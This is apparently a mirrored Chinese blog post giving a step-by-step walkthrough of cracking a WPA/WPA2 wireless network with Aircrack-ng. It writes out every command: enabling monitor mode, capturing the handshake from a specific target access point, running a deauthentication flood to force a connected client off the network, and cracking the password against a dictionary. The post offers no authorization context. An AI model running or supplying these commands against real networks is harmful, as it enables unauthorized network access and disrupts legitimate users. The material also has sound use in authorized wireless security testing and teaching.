zoukankan      html  css  js  c++  java
  • Wireless Attacks——Aircarck-ng

    利用Aircrack-ng工具破解WPA/WPA2加密模式的无线AP

    http://www.aircrack-ng.org/index.html

    1. 开启网卡的监听模式,命令:

    airmon-ng start wlan0

    验证是否开启Monitor模式,命令:

    iwconfig

    Mode:“Monitor”,表示网卡开启成功,可进行下一步操作。

    2. 利用网卡扫描附近WiFi,并记录下关键参数,命令:

    airodump-ng wlan0mon

    这时我们找到所需要的WiFi(Game2.4)按Ctrl+c并记录下关键参数,后续步骤会用到下列数据:

    1)BSSID: A0:63:91:CA:D2:9B (AP 的MAC地址)
    2)CH:11(信道)

    3. 开始监听、捕获握手包,命令:

    airodump-ng -w cao -c 11 --bssid A0:63:91:CA:D2:9B wlan0mon
    参数解释:   
    -w 文件位置,保存在/root/cao   -c 信道   --bssid BSSID 网卡名


    4. 再新建shell窗口 ,对目标WiFi进行攻击,命令:

    在上一步中我们是被动等待,何时能抓取到握手包依赖于何时有设备与该wifi完成成功的认证。

    我们可以用aireplay-ng进行deauth洪水攻击,使已连接它的客户端设备掉线,掉线设备一般会自动重连wifi,这样就能快速获取握手包。

    aireplay-ng -0 5 -a A0:63:91:CA:D2:9B -c E4:FD:A1:B7:18:A9 wlan0mon
    参数解释:   
    -0 是一种攻击模式,不间断攻击    5 发包次数为5次   -a BSSID   -c 为客户端MAC

     然后,返回看前面的窗口,检查是否抓到握手包,出现下图字样,则代表成功抓取握手包。

     

    5. 密码破解,命令:

    aircrack-ng -w /usr/share/wordlists/fasttrack.txt -b A0:63:91:CA:D2:9B cao-01.cap
    参数解释:
      -w 指定 密码字典(默认就有)
      
    -b 指定 路由器的MAC地址 截获的握手包

     

    6. 总结

      只适用于简单密码的破解,本文侧重点是讲解 Aircrack-ng 工具的使用。该工具使用命令行模式,使用时不是很方便,成功率依赖字典库。

    Life is not what you have gained but what you have done!
  • 相关阅读:
    OpenCV中Mat,图像二维指针和CxImage类的转换
    opencv reduce()函数
    vc 6.0添加版本信息
    tesseract::TessBaseAPI api
    lnk1146 erro,solution
    LNK2001 error 解决方法
    Error LNK2038 mismatch detected for 'RuntimeLibrary': value 'MT_StaticRelease' doesn't match value 'MD_DynamicRelease'
    APP后台架构开发实践笔记
    从0到1 快速建一个区块链
    App 后台架构
  • 原文地址:https://www.cnblogs.com/cmt110/p/15124109.html
Copyright © 2011-2022 走看看